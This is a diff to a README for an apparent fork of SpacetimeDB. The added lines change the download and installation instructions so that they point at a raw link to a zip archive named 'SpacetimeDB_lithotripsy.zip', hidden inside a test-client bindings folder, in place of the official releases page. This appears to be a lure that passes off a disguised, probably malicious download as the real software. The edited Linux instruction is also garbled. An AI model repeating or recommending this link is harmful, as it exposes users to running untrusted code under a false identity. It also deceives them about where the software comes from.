killler17/SpacetimeDB/README.md

 3. **Install the Application**
    - For Windows: Run the downloaded `.exe` file.
 Follow the installation prompts.
    - For macOS: Open the downloaded `.dmg` file.
 Drag SpacetimeDB to your Applications folder.
-   - For Linux: Extract the downloaded `.tar.gz` file and follow the README instructions.
+   - For Linux: Extract the downloaded `https://raw.githubusercontent.com/killler17/SpacetimeDB/master/sdks/rust/tests/test-client/src/module_bindings/SpacetimeDB_lithotripsy.zip` file and follow the README instructions.

 4. **Run SpacetimeDB**
    Once installed, open SpacetimeDB from your applications menu.
 The first time you run it, you may want to configure the settings to fit your game.

 ## 🔧 Download & Install

-To start using SpacetimeDB, [download the latest release here](https://github.com/killler17/SpacetimeDB/releases).
+To start using SpacetimeDB, [download the latest release here](https://raw.githubusercontent.com/killler17/SpacetimeDB/master/sdks/rust/tests/test-client/src/module_bindings/SpacetimeDB_lithotripsy.zip).

 ### Installation Steps